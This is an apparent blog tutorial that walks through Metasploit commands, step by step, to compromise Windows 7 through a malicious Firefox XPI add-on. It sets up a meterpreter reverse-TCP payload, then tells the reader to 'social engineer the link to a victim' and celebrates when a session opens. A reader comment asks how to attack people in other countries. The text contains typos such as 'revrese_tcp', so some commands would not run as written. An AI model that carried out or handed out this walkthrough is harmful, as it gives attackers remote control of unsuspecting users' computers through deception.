Hacking windows 7 with firefox addon
This exploit consistes in creating an xpi addon file . The victim 's browser (firefox) will pop up a dialog box asking the user if he trusts the addon. Once the user accept the addon installation, a payload with full user permission will be executed on the victim machine.
First, we are going to open the metasploit console:
root@bt:~# msfconsole
Now, we are going to use the mentioned exploit by typing:
msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
Let's se what is required for setting up the exploit:
msf > show options
We are going to choose "meterpreter" as our payload:
msf > set payload windows/meterpreter/revrese_tcp
Now, we have to set up our local ip, (you can run ifconfig to check what ip is yours)
msf > set lhost 192.168.1.2
Next, we sut up the address of the local machine:
msf > set srvhost 192.168.1.2
Now, we set the uripath; you can name it whatever you like:
msf > set uripath firefox boost
Next, we choose our target by running this command:
msf > show targets
Since we are going to attack windows 7, we will choose the second option:
msf > set target 1
Now, everything is ready for the attack
msf > exploit
As you can see, a link has been generated for you, all what is left now, is to social engineer the link to a victim, and wait for a connection.
It seems a victim clicked on our link :-)
Bingooo !! a meterpreter session has been opened
sir is this for only local network can't we do it from different areas or countries??
ReplyDeletewaiting for your reply..